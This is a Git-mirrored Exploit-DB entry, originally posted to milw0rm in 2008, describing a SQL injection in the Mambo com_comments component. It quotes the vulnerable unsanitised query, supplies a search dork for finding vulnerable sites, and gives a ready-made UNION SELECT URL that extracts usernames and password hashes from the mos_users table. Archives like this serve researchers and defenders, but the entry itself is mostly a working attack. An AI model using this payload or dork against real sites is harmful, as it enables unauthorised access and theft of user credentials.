bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5094.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

37 lines
No EOL
1 KiB
Text
Raw Blame History

#########################################################
##
## Mambo SQL Injection (com_comments)
##
## Version Affected: <= 0.5.8.5g
## Author: CheebaHawk215
## Home page: http://www.always420forum.com
##
#########################################################
##
## Dork: "Review Script", "Phil Taylor"
##
#########################################################
##
## Vulnerable Code:
##
##########################################################
$pt_query = "SELECT * FROM mos_content_comments where articleid=$id AND published=1 order by id DESC";
#########################################################
##
## Exploit:
##
#########################################################
http://site.com/index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+from+mos_content_comments+where+1=1
## This is my first exploit!
## thanks to all who came before me, and enabled me to learn from their efforts!
# milw0rm.com [2008-02-09]
Reference in a new issue View git blame Copy permalink